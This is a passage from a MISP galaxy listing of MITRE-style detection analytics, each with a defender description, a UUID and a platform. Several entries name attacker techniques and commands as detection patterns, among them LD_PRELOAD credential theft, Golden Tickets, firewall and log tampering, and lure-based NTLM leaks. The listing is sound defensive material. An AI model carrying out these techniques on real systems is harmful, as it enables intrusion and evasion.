Use of chflags hidden or SetFile -a V commands to hide files, or creation of hidden files with leading '.'. Defender view: monitoring process execution and file metadata changes setting UF_HIDDEN attribute.

Internal MISP references

UUID 73931643-7fae-409c-98b3-00bd88e246e0 which can be used as unique global reference for Analytic 0093 - AN0093 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0093
mitre_platforms ['macOS']

Analytic 0390 - AN0390

Detects credential interception via malicious LD_PRELOAD-based shared libraries loaded into ssh, sudo, or scp processes. Correlates environment variable injection, unexpected library loads, and memory patching behavior.

Internal MISP references

UUID c031c27b-4d05-406a-8538-04ce1df41d35 which can be used as unique global reference for Analytic 0390 - AN0390 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0390
mitre_platforms ['Linux']

Analytic 0903 - AN0903

Detects usage of commands or binaries (e.g., netstat, PowerShell Get-NetTCPConnection) and WMI or API calls to enumerate local or remote network connections.

Internal MISP references

UUID d78b4bb3-bd0a-4e43-bc19-0a7b72f6a9d3 which can be used as unique global reference for Analytic 0903 - AN0903 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0903
mitre_platforms ['Windows']

Analytic 0930 - AN0930

ESXi shell or scripts produce long, high-entropy tokens (non-standard alphabets) in shell.log/hostd, followed by outbound flows (NSX/Zeek) with asymmetric ratios or protocol mismatches to non-management endpoints.

Internal MISP references

UUID e518b7e5-6e98-43f6-86c2-f45f684c650f which can be used as unique global reference for Analytic 0930 - AN0930 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0930
mitre_platforms ['ESXi']

Analytic 0440 - AN0440

Suspicious SaaS tenant activity involving webhook configurations pointing to external or untrusted domains. Defender perspective: repeated automated exports or suspicious webhook endpoint registrations.

Internal MISP references

UUID 4b72b349-f810-4e34-9185-b5550147147e which can be used as unique global reference for Analytic 0440 - AN0440 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0440
mitre_platforms ['SaaS']

Analytic 0404 - AN0404

Flows showing encrypted payloads with high entropy not matching TLS handshake patterns, particularly when occurring on non-standard ports. Defender observes NetFlow/IPFIX byte distribution anomalies or IDS/IPS detecting symmetric encryption patterns without associated key exchange.

Internal MISP references

UUID 94e5fd96-1fde-41fd-863d-6ef9cb8a3e1a which can be used as unique global reference for Analytic 0404 - AN0404 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0404
mitre_platforms ['Network Devices']

Analytic 0044 - AN0044

Detects snapshots or data stored in VMFS volumes from root CLI or remote agents.

Internal MISP references

UUID e59e2d8c-20cb-4a77-9d8b-1d838b01bd87 which can be used as unique global reference for Analytic 0044 - AN0044 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0044
mitre_platforms ['ESXi']

Analytic 0045 - AN0045

Detects unusual command executions and service modifications that indicate self-patching or disabling of vulnerable services post-compromise. Defenders should monitor for service stop commands, suspicious process termination, and execution of binaries or scripts aligned with known patching or service management tools outside of expected admin contexts.

Internal MISP references

UUID 16e57a41-f305-4aa7-9125-15272052419e which can be used as unique global reference for Analytic 0045 - AN0045 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0045
mitre_platforms ['Windows']

Analytic 0540 - AN0540

Detection of known tools or malware flagged by antivirus, followed by a near-term drop of a similar binary with modified signature and resumed activity (execution, C2, or persistence).

Internal MISP references

UUID 2c94147a-a556-4fa1-92f8-d3c4367f6f2e which can be used as unique global reference for Analytic 0540 - AN0540 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0540
mitre_platforms ['Windows']

Analytic 0054 - AN0054

A process loads a non-system .dylib/.so via dyld (dlopen/dlsym) from user-writable locations (~/Library, /tmp) or after the library was recently created/downloaded, often followed by network egress or persistence.

Internal MISP references

UUID 52a5dffb-f3a3-45fc-97b3-2c09fed8e0b4 which can be used as unique global reference for Analytic 0054 - AN0054 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0054
mitre_platforms ['macOS']

Analytic 0504 - AN0504

Detection of VNC service or executable starting unexpectedly, followed by user session creation and interactive desktop activity (mouse/keyboard simulation).

Internal MISP references

UUID 7c91d6c7-4591-41b1-9c08-0c0660b07d24 which can be used as unique global reference for Analytic 0504 - AN0504 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0504
mitre_platforms ['Windows']

Analytic 0450 - AN0450

Detect abnormal MFA activity within cloud service provider logs, such as repeated generation of MFA challenges for the same user session or mismatched MFA device and login origin.

Internal MISP references

UUID 824db63f-2a2c-4e3e-8e7d-49110cc63173 which can be used as unique global reference for Analytic 0450 - AN0450 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0450
mitre_platforms ['IaaS']

Analytic 0405 - AN0405

Detects forged Kerberos Golden Tickets by correlating anomalous Kerberos ticket lifetimes, unexpected encryption types (e.g., RC4 in modern domains), malformed fields in logon/logoff events, and TGS requests without preceding TGT requests. Also monitors for abnormal patterns of access associated with elevated privileges across multiple systems.

Internal MISP references

UUID fd614a66-7e99-4a69-9070-3c11036f0335 which can be used as unique global reference for Analytic 0405 - AN0405 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0405
mitre_platforms ['Windows']

Analytic 0046 - AN0046

Detects adversary attempts to monopolize control of compromised systems by issuing service stop commands, unloading vulnerable modules, or forcefully killing competing processes. Defenders should monitor audit logs and syslog for administrative utilities (systemctl, service, kill) being invoked outside of normal change management.

Internal MISP references

UUID 0a1f9686-4fd6-4719-84ef-7a590d02d1fb which can be used as unique global reference for Analytic 0046 - AN0046 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0046
mitre_platforms ['Linux']

Analytic 0604 - AN0604

Userland or kernel-level ransomware encrypting user files (Documents, Desktop) using srm, gpg, or compiled payloads. Often correlated with ransom note creation in multiple directories.

Internal MISP references

UUID 3b18d20b-94c7-41e7-8f82-99148945a74f which can be used as unique global reference for Analytic 0604 - AN0604 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0604
mitre_platforms ['macOS']

Analytic 0064 - AN0064

Attacker disables VM-related services or stops VMs forcibly to target vmdk or logs. Behavioral chain: esxcli or vim-cmd stop + audit log showing user privilege use + datastore file manipulation.

Internal MISP references

UUID 9e12e1f0-1547-4008-8755-2b3bc1c00279 which can be used as unique global reference for Analytic 0064 - AN0064 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0064
mitre_platforms ['ESXi']

Analytic 0460 - AN0460

Chain: (1) SaaS admin API or PowerShell remote session reads tenant password/authentication settings (e.g., M365 Unified Audit Log ‘Cmdlet’ with Get-MsolPasswordPolicy/Get-OrganizationConfig parameters that expose password settings); (2) same session proceeds to mailbox or tenant changes.

Internal MISP references

UUID d71a1e3e-6507-438b-9ee2-f80dc1f938d2 which can be used as unique global reference for Analytic 0460 - AN0460 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0460
mitre_platforms ['SaaS']

Analytic 0406 - AN0406

Detection of firewall tampering by monitoring processes executing netsh, PowerShell Set-NetFirewallProfile, or sc stop mpssvc. Registry modifications under HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy also indicate adversarial actions.

Internal MISP references

UUID df0f8f0a-1e92-415d-b15e-63cea928973a which can be used as unique global reference for Analytic 0406 - AN0406 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0406
mitre_platforms ['Windows']

Analytic 0640 - AN0640

CLI-based or API-based network call from the hypervisor to external staging host, shortly followed by a connection to a second external IP by a spawned process or scheduled task.

Internal MISP references

UUID e8c91885-736e-4348-ba09-2acfbdd8b176 which can be used as unique global reference for Analytic 0640 - AN0640 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0640
mitre_platforms ['ESXi']

Analytic 0407 - AN0407

Detection of iptables, nftables, or firewalld rule modifications. Correlation of sudden drops in active firewall rules with suspicious processes suggests adversarial evasion.

Internal MISP references

UUID 3327048a-e90c-47e5-9b67-d2ecaa89523c which can be used as unique global reference for Analytic 0407 - AN0407 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0407
mitre_platforms ['Linux']

Analytic 0470 - AN0470

Detects modification or truncation of /var/log/shell.log used to persist ESXi shell command history. Especially suspicious shortly after login or config changes.

Internal MISP references

UUID d17e0719-d338-47eb-a5b4-8616749584cf which can be used as unique global reference for Analytic 0470 - AN0470 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0470
mitre_platforms ['ESXi']

Analytic 0704 - AN0704

Monitor system APIs such as CFNetwork and SecureTransport for anomalies in transmitted data streams. Detect mismatches in file hashes or SSL/TLS downgrade attempts that enable manipulation of transmitted data.

Internal MISP references

UUID da6d7de2-a666-4fa3-aa53-54692a8167ae which can be used as unique global reference for Analytic 0704 - AN0704 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0704
mitre_platforms ['macOS']

Analytic 0740 - AN0740

Detects Exchange Online or on-prem transport rule changes (e.g., header stripping) and mailbox export cleanup via Remove-MailboxExportRequest, as well as admin actions via Exchange PowerShell sessions.

Internal MISP references

UUID dff59103-f6d4-4580-8316-a0528768b4b3 which can be used as unique global reference for Analytic 0740 - AN0740 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0740
mitre_platforms ['Office Suite']

Analytic 0047 - AN0047

Detects unauthorized termination of system daemons or commands issued through launchctl or kill to stop competing services or malware processes. Defenders should monitor unified logs and EDR telemetry for unusual service modifications or terminations.

Internal MISP references

UUID f84124d2-8bc6-4dae-a579-f0ddb0338a2f which can be used as unique global reference for Analytic 0047 - AN0047 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0047
mitre_platforms ['macOS']

Analytic 0074 - AN0074

Correlated registry modifications under Print Processors path, followed by DLL file creation within the system print processor directory, and DLL load by spoolsv.exe. Malicious execution often occurs during service restart or system boot, with SYSTEM-level privileges.

Internal MISP references

UUID ffe7278f-7cd1-402f-a3a7-dcc7a363b031 which can be used as unique global reference for Analytic 0074 - AN0074 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0074
mitre_platforms ['Windows']

Analytic 0408 - AN0408

Detection of PF firewall rule modifications via pfctl, socketfilterfw, or defaults write to com.apple.alf. Adversaries often disable firewall profiles entirely or whitelist malicious processes.

Internal MISP references

UUID 38c74fcf-2a4d-45cd-8465-b5d80a605bd8 which can be used as unique global reference for Analytic 0408 - AN0408 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0408
mitre_platforms ['macOS']

Analytic 0480 - AN0480

Bash, Swift, or Objective-C programs enumerate system profile, I/O registry, or inspect kernel extensions to identify VM artifacts

Internal MISP references

UUID 5a92bf3c-1832-453b-8ac9-24f8688d6faf which can be used as unique global reference for Analytic 0480 - AN0480 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0480
mitre_platforms ['macOS']

Analytic 0804 - AN0804

Disabling or altering security and audit logs in SaaS admin panels (e.g., Slack, Zoom, Salesforce). Defender view: API calls or admin console changes that stop event exports or logging integrations.

Internal MISP references

UUID 967f7636-1547-4db7-921a-1b84f312a2cd which can be used as unique global reference for Analytic 0804 - AN0804 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0804
mitre_platforms ['SaaS']

Analytic 0084 - AN0084

Virtual instances or workloads generating sustained outbound data rates, often to TOR, VPN, or proxy endpoints. Often coincides with unusual IAM usage or deployed scripts (e.g., cron jobs using proxy clients).

Internal MISP references

UUID b0d018e2-0384-4e27-92ed-c9b181999fa9 which can be used as unique global reference for Analytic 0084 - AN0084 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0084
mitre_platforms ['IaaS']

Analytic 0048 - AN0048

Adversary executes commands to enumerate installed antivirus, EDR, or firewall agents using WMI, registry queries, and built-in tools (e.g., tasklist, netsh, sc query). Correlated with elevated process privileges or scripting engine usage.

Internal MISP references

UUID d0d1375d-f5c2-4271-b5e7-415c478d5e86 which can be used as unique global reference for Analytic 0048 - AN0048 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0048
mitre_platforms ['Windows']

Analytic 0840 - AN0840

Suspicious calls to dlopen(), dlsym(), or mmap with RWX flags in processes that do not typically perform dynamic module loading. Monitor anonymous memory regions executed by user processes.

Internal MISP references

UUID da7cf744-fc04-4b17-8a96-3140a4b349d6 which can be used as unique global reference for Analytic 0840 - AN0840 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0840
mitre_platforms ['macOS']

Analytic 0904 - AN0904

Detects use of netstat, ss, lsof, or custom shell scripts to list current network connections. Often paired with privilege escalation or staging.

Internal MISP references

UUID 10dcfce8-70df-4682-ab04-90279d7292f9 which can be used as unique global reference for Analytic 0904 - AN0904 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0904
mitre_platforms ['Linux']

Analytic 0409 - AN0409

Detection of firewall changes using esxcli network firewall set or vSphere API modifications. Sudden disabling of firewall rules across management interfaces is a strong adversarial signal.

Internal MISP references

UUID 1fecb6f7-e72f-452e-a078-3298cba8d481 which can be used as unique global reference for Analytic 0409 - AN0409 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0409
mitre_platforms ['ESXi']

Analytic 0049 - AN0049

Adversary runs discovery commands such as ps aux, systemctl status, or cat /etc/init.d/ to enumerate security software or services. Often occurs alongside privilege escalation or bash script execution.

Internal MISP references

UUID 3928ff9c-961e-455c-a2b1-d79ca788591f which can be used as unique global reference for Analytic 0049 - AN0049 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0049
mitre_platforms ['Linux']

Analytic 0094 - AN0094

Defenders can observe suspicious replacement or tampering of system accessibility binaries (e.g., utilman.exe, sethc.exe, osk.exe) and anomalous modifications to registry keys used to redirect accessibility programs (such as IFEO keys). Additionally, execution of cmd.exe or other suspicious binaries triggered from the login screen by SYSTEM can be correlated as part of a behavior chain.

Internal MISP references

UUID 6b5b9cd2-f6ba-4ed5-bea2-30edbf85501e which can be used as unique global reference for Analytic 0094 - AN0094 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0094
mitre_platforms ['Windows']

Analytic 0940 - AN0940

Detection of msiexec.exe running installer packages that result in anomalous process creation. Look for unexpected binaries executed by msiexec or custom action DLLs in the temp directory.

Internal MISP references

UUID 9c9db399-4f87-477b-be31-536857b7912d which can be used as unique global reference for Analytic 0940 - AN0940 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0940
mitre_platforms ['Windows']

Analytic 0490 - AN0490

Excessive inbound HTTP or TLS connections to services such as Apache or Nginx, causing worker thread exhaustion or segmentation faults.

Internal MISP references

UUID c7752951-1077-478d-9511-df852cba6b28 which can be used as unique global reference for Analytic 0490 - AN0490 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0490
mitre_platforms ['Linux']

Analytic 0505 - AN0505

Spawning of VNC-related processes (e.g., x11vnc, vncserver) coupled with authentication logs and port listening behavior on TCP 5900.

Internal MISP references

UUID 9032a591-de05-44c2-b1f6-3d711f417cce which can be used as unique global reference for Analytic 0505 - AN0505 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0505
mitre_platforms ['Linux']

Analytic 0550 - AN0550

Abuse of ClickOnce applications where rundll32.exe invokes dfshim.dll with ShOpenVerbApplication or dfsvc.exe spawns unexpected child processes or loads unsigned modules.

Internal MISP references

UUID dc4d944f-975a-4057-8edb-deb023db387c which can be used as unique global reference for Analytic 0550 - AN0550 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0550
mitre_platforms ['Windows']

Analytic 0055 - AN0055

Executable or script payloads lacking symbol information and readable strings that are created or dropped by unusual or short-lived processes.

Internal MISP references

UUID e7b2c8da-d54d-446a-a7f6-062fe234a8cc which can be used as unique global reference for Analytic 0055 - AN0055 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0055
mitre_platforms ['Windows']

Analytic 0605 - AN0605

Ransomware encrypts .vmdk, .vmx, .log, or VM config files in VMFS datastores. May rename to .locked or delete/overwrite with encrypted versions. Often correlates with shell commands run through dcui, SSH, or vSphere.

Internal MISP references

UUID 203586e5-e178-4d41-bbae-93a86f04977b which can be used as unique global reference for Analytic 0605 - AN0605 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0605
mitre_platforms ['ESXi']

Analytic 0650 - AN0650

Unsigned processes accessing system memory or launching known credential scraping tools (e.g., osascript, dylib injections) to access the Keychain or sensitive memory regions.

Internal MISP references

UUID 29370f2b-0877-458c-8ade-a9a23b8fb7b2 which can be used as unique global reference for Analytic 0650 - AN0650 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0650
mitre_platforms ['macOS']

Analytic 0056 - AN0056

Executable or binary files created without symbol tables or with stripped sections, especially by non-user shell processes or compilers invoked outside standard dev paths.

Internal MISP references

UUID 52d150da-36f4-43b4-96c4-b4fe33b012a2 which can be used as unique global reference for Analytic 0056 - AN0056 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0056
mitre_platforms ['Linux']

Analytic 0560 - AN0560

Execution of ifconfig, ip a, or access to /proc/net/ indicating collection of local interface and route configuration.

Internal MISP references

UUID 6a57daad-9d2c-4851-a46e-b6ebac607a4c which can be used as unique global reference for Analytic 0560 - AN0560 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0560
mitre_platforms ['Linux']

Analytic 0506 - AN0506

Detection of VNC-based remote control via screensharingd activity in Unified Logs along with concurrent remote login activity or suspicious user interaction.

Internal MISP references

UUID b88251d3-6406-4512-a55f-a6bc3493e2ad which can be used as unique global reference for Analytic 0506 - AN0506 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0506
mitre_platforms ['macOS']

Analytic 0065 - AN0065

Adversary stages a lure that references a remote resource (e.g., LNK/SCF/Office template). When the user opens/renders the file or a shell enumerates icons, the host automatically attempts SMB or WebDAV authentication to the attacker host. The chain is: (1) lure file is created or modified in a user-exposed location → (2) user or system accesses the lure → (3) host makes outbound NTLM (SMB 139/445 or WebDAV over 80/443) to an untrusted destination → (4) repeated attempts from multiple users/hosts or from privileged workstations.

Internal MISP references

UUID f2064dd1-8cdb-472e-b187-8d1ef18fb059 which can be used as unique global reference for Analytic 0065 - AN0065 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0065
mitre_platforms ['Windows']

Analytic 0075 - AN0075

Detects unexpected or high-volume HTTP/S/WebSocket communication from suspicious processes (e.g., PowerShell, rundll32) using uncommon user agents or mimicking browser traffic to unusual domains or IPs.

Internal MISP references

UUID 04fe83c3-d8d3-4c96-91a4-9167fa8f405a which can be used as unique global reference for Analytic 0075 - AN0075 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0075
mitre_platforms ['Windows']

Analytic 0705 - AN0705

Monitor for use of native utilities such as wevtutil.exe or PowerShell cmdlets (Get-WinEvent, Get-EventLog) to enumerate or export logs. Unusual access to security or system event channels, especially by non-administrative users or processes, should be correlated with subsequent file export or network transfer activity.

Internal MISP references

UUID 13810047-61f4-4cd0-aeda-6727d652da90 which can be used as unique global reference for Analytic 0705 - AN0705 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0705
mitre_platforms ['Windows']

Analytic 0057 - AN0057

Creation of run-only AppleScripts or Mach-O binaries lacking symbol table and string references, especially when dropped by user space scripting engines or staging apps.

Internal MISP references

UUID 1b5b9ee8-69e6-41d4-a529-aa18afcdf453 which can be used as unique global reference for Analytic 0057 - AN0057 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0057
mitre_platforms ['macOS']

Analytic 0750 - AN0750

Logon via RDP or WMI by a user account followed by uncommon command execution, file manipulation, or lateral network connections.

Internal MISP references

UUID 34c5e959-876b-4851-8ebf-bfaf97e9e609 which can be used as unique global reference for Analytic 0750 - AN0750 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0750
mitre_platforms ['Windows']

Analytic 0507 - AN0507

Detection of adversary enumeration of domain or local group memberships via native tools such as net.exe, PowerShell, or WMI. This activity may precede lateral movement or privilege escalation.

Internal MISP references

UUID d14cc347-9e27-479d-8347-1a5950cdd70c which can be used as unique global reference for Analytic 0507 - AN0507 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0507
mitre_platforms ['Windows']

Analytic 0570 - AN0570

A non-whitelisted process receives TCC camera entitlement (kTCCServiceCamera), opens AppleCamera/AVFoundation device handles, writes .mov/.mp4 artifacts to unusual locations, and/or beacons/exfiltrates soon after.

Internal MISP references

UUID db3263c7-0abc-47be-a9f3-434d255b1e0e which can be used as unique global reference for Analytic 0570 - AN0570 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0570
mitre_platforms ['macOS']

Analytic 0805 - AN0805

Detects creation or modification of crontab entries by non-root users or from abnormal parent processes, followed by the execution of uncommon binaries at scheduled intervals.

Internal MISP references

UUID 0fbbc547-37a7-4d00-a8a4-5fbcf3d27a1e which can be used as unique global reference for Analytic 0805 - AN0805 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0805
mitre_platforms ['Linux']

Analytic 0085 - AN0085

Adversary uses a tool like Ruler to insert a malicious custom form into the user's Outlook mailbox. The form is designed to auto-execute on Outlook startup or on receipt of a specially crafted email. This results in child processes launched from outlook.exe and possibly network connections or payload loading.

Internal MISP references

UUID 48cc1694-568f-4602-96e4-cbbe099c6dae which can be used as unique global reference for Analytic 0085 - AN0085 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0085
mitre_platforms ['Windows']

Analytic 0508 - AN0508

Detection of group enumeration using commands like 'id', 'groups', or 'getent group', often followed by privilege escalation or SSH lateral movement.

Internal MISP references

UUID 56a17328-c6b0-4e3d-9404-d4b8ba967a14 which can be used as unique global reference for Analytic 0508 - AN0508 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0508
mitre_platforms ['Linux']

Analytic 0580 - AN0580

Detects suspicious registry modifications under HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\*\Driver, DLL loads by spoolsv.exe of non-standard or unsigned modules, and abnormal usage of the AddMonitor API by non-installation processes. This pattern often indicates an attempt to persist a malicious DLL via the print monitor mechanism, particularly when correlated with creation of files in C:\Windows\System32 not tied to known patches or installations.

Internal MISP references

UUID 61729716-59f3-433e-a678-101c18040851 which can be used as unique global reference for Analytic 0580 - AN0580 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0580
mitre_platforms ['Windows']

Analytic 0850 - AN0850

Exploitation of system or application vulnerability (e.g., CVE-based exploit) followed by service crash, restart, or repeated failure within a short time frame, impacting application/system availability.

Internal MISP references

UUID 6bb68520-c27e-435a-86b5-eb2ce7841cb2 which can be used as unique global reference for Analytic 0850 - AN0850 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0850
mitre_platforms ['Windows']

Analytic 0058 - AN0058

Inbound binary payloads transferred over HTTP/S with compressed or encoded headers, lacking signature markers or metadata indicative of compiler/toolchain.

Internal MISP references

UUID a53e2979-2c41-44bc-b46e-13a19305e00d which can be used as unique global reference for Analytic 0058 - AN0058 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0058
mitre_platforms ['Network Devices']

Analytic 0059 - AN0059

Detects modification of shell startup/logout scripts such as ~/.bashrc, ~/.bash_profile, or /etc/profile, followed by anomalous process execution or network connections upon interactive or remote shell login.

Internal MISP references

UUID 3ae99176-ce61-4598-834b-f48d13802dcb which can be used as unique global reference for Analytic 0059 - AN0059 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0059
mitre_platforms ['Linux']

Analytic 0095 - AN0095

Identifies adversary behavior that launches commands or invokes APIs to enumerate active processes (e.g., tasklist.exe, Get-Process, or CreateToolhelp32Snapshot). Detects execution combined with parent process lineage, network session context, or remote origin.

Internal MISP references

UUID 625983e7-9736-44f4-98ba-f372b3a3d236 which can be used as unique global reference for Analytic 0095 - AN0095 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0095
mitre_platforms ['Windows']

Analytic 0905 - AN0905

Detects shell-based enumeration of active connections using netstat, lsof -i, or AppleScript-based system discovery.

Internal MISP references

UUID 635f834e-ee46-496f-aec4-23dbef04451b which can be used as unique global reference for Analytic 0905 - AN0905 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0905
mitre_platforms ['macOS']

Analytic 0950 - AN0950

Detects modification of system or application binaries by monitoring /usr/bin, /bin, and other privileged directories. Correlates file integrity monitoring (FIM) events with unexpected process executions or service restarts.

Internal MISP references

UUID 9b2ff34a-1967-46a9-b355-f9584a0715b5 which can be used as unique global reference for Analytic 0950 - AN0950 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0950
mitre_platforms ['Linux']

Analytic 0590 - AN0590

Detection of suspicious logon behavior using valid domain accounts across multiple hosts, off-hours, or simultaneous sessions from geographically distant locations.

Internal MISP references

UUID c7706ddb-cf88-41c7-981b-a5e1bf6cfcfc which can be used as unique global reference for Analytic 0590 - AN0590 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0590
mitre_platforms ['Windows']

Analytic 0509 - AN0509

Group membership checks via 'dscl', 'dscacheutil', or 'id', typically executed via terminal or automation scripts.

Internal MISP references

UUID ef8fa56d-882e-42da-990e-2adc3a771041 which can be used as unique global reference for Analytic 0509 - AN0509 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0509
mitre_platforms ['macOS']

Analytic 0606 - AN0606

Encryption of cloud storage objects (e.g., S3 buckets) via Server-Side Encryption (SSE-C) or by replacing objects with encrypted variants. May include API patterns like PutObject with SSE-C headers.

Internal MISP references

UUID 57d8fd27-9af5-4d01-9d1a-fdde8ec0c902 which can be used as unique global reference for Analytic 0606 - AN0606 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0606
mitre_platforms ['IaaS']

Analytic 0660 - AN0660

Detection of changes to /etc/rc.local.d/local.sh or rc.local during post-boot script execution with abnormal commands or additions.

Internal MISP references

UUID 69562961-14e6-42a7-9f8a-24ac00f6404e which can be used as unique global reference for Analytic 0660 - AN0660 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0660
mitre_platforms ['ESXi']

Analytic 0066 - AN0066

Detection of unpacking behavior through abnormal memory allocation, followed by executable code injection and execution from non-image sections.

Internal MISP references

UUID e6a7eeb3-0652-460c-b68b-f17d2ed82822 which can be used as unique global reference for Analytic 0066 - AN0066 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0066
mitre_platforms ['Windows']

Analytic 0067 - AN0067

Correlates ELF file execution with high-entropy writable memory segments and self-modifying code patterns.

Internal MISP references

UUID 3cb4d3f4-df71-474c-a9f0-438dbf26bf66 which can be used as unique global reference for Analytic 0067 - AN0067 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0067
mitre_platforms ['Linux']

Analytic 0607 - AN0607

Detection focuses on unauthorized modification of Mach-O binaries to include LC_LOAD_DYLIB headers pointing to malicious dylibs. Behavior is identified via a chain of file metadata changes, removal of code signatures, and subsequent anomalous dylib loads at runtime. Correlation of file changes with lack of authorized updates and process memory mapping of unrecognized or unsigned libraries is crucial.

Internal MISP references

UUID 7aaf568b-bc31-4fb0-8543-12ee281a0b85 which can be used as unique global reference for Analytic 0607 - AN0607 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0607
mitre_platforms ['macOS']

Analytic 0670 - AN0670

Detection of syslog configuration tampering using esxcli system syslog config set or reload. Defender correlates command execution with absence of syslog forwarding activity.

Internal MISP references

UUID b3828af6-912b-493b-b621-3448a8f07972 which can be used as unique global reference for Analytic 0670 - AN0670 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0670
mitre_platforms ['ESXi']

Analytic 0076 - AN0076

Detects curl, wget, Python requests, or custom HTTP clients communicating over non-standard ports, with repetitive or beacon-like patterns or POST-heavy behavior to rare domains.

Internal MISP references

UUID cba23232-7fae-47df-bd83-0ca5a5066373 which can be used as unique global reference for Analytic 0076 - AN0076 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0076
mitre_platforms ['Linux']

Analytic 0706 - AN0706

Monitor for suspicious use of commands such as cat, less, grep, or journalctl accessing /var/log/ files. Abnormal enumeration of authentication logs (auth.log, secure) or bulk access to multiple logs in short time windows should be flagged.

Internal MISP references

UUID ee468e26-d179-47ba-af8b-43118db24939 which can be used as unique global reference for Analytic 0706 - AN0706 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
